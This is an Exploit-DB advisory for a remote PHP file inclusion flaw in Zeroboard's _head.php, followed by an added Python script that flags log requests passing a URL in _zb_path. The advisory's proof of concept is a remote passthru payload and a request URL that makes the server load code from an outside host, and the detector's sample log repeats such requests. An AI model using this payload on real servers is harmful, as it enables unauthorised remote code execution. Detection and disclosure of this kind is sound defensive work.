- 18 Dec 2022
- EDB-ID: 21557
- EDB Verified: Passed
- Author: ONLOOKER
- Vulnerability type: WEBAPPS
- Platform: PHP
- CVE: cve-2002-1704
- Published: 2002-06-15
Code:
source: https://www.securityfocus.com/bid/5028/info
Zeroboard is a PHP web board package available for the Linux and Unix platforms.
Under some circumstances, it may be possible to include arbitrary PHP files. The _head.php file does not sufficiently check or sanitize input. When the "allow_url_fopen" variable and the "register_globals" variable in php.ini are set to "On," it is possible to load a PHP include file from a remote URL via the _head.php script.
PHP Source file a.php
<? passthru("/bin/ls"); ?>
Accessing URL on vulnerable system:
http://vulnerablesystem/_head.php?_zb_path=http://example.com/a
- Source: www.exploit-db.com
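For reviewing web server logs for the request pattern described in the advisory above, the following is an added example and not part of the original advisory or of Zeroboard. It flags requests to `_head.php` whose `_zb_path` parameter decodes to a URL rather than a local path; the log lines, the `/zboard/` directory and the client addresses are constructed sample data.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (Common Log Format). The /zboard/
# directory and the 192.0.2.x clients are placeholders, not from the advisory.
SAMPLE_LOG = """\
192.0.2.10 - - [15/Jun/2002:10:00:01 +0000] "GET /zboard/_head.php HTTP/1.0" 200 512
192.0.2.11 - - [15/Jun/2002:10:00:05 +0000] "GET /zboard/_head.php?_zb_path=http://example.com/a HTTP/1.0" 200 2048
192.0.2.12 - - [15/Jun/2002:10:00:09 +0000] "GET /zboard/_head.php?_zb_path=http%3A%2F%2Fexample.com%2Fa HTTP/1.0" 200 2048
192.0.2.13 - - [15/Jun/2002:10:00:12 +0000] "GET /zboard/zboard.php?id=free&page=2 HTTP/1.0" 200 9000
"""

# Client address and request target from a Common Log Format line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:[A-Z]+) (\S+) HTTP/[\d.]+"')
# A value that starts with "<scheme>://" is a URL, not a local include path.
SCHEME_RE = re.compile(r'^\s*[a-z][a-z0-9+.\-]*://', re.IGNORECASE)


def suspicious_requests(log_text, script="/_head.php", param="_zb_path"):
    """Return (client, decoded_value) for each request that passes a URL
    in `param` to `script`."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        parts = urlsplit(target)
        if not parts.path.lower().endswith(script):
            continue
        # parse_qsl percent-decodes, so encoded values are compared in
        # their decoded form.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if name == param and SCHEME_RE.match(value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, value in suspicious_requests(SAMPLE_LOG):
        print(f"{client} passed a URL in _zb_path: {value}")
```

With register_globals enabled the same variable can also arrive in a POST body or a cookie, which standard access logs do not record, so an empty result from this check does not rule the request out.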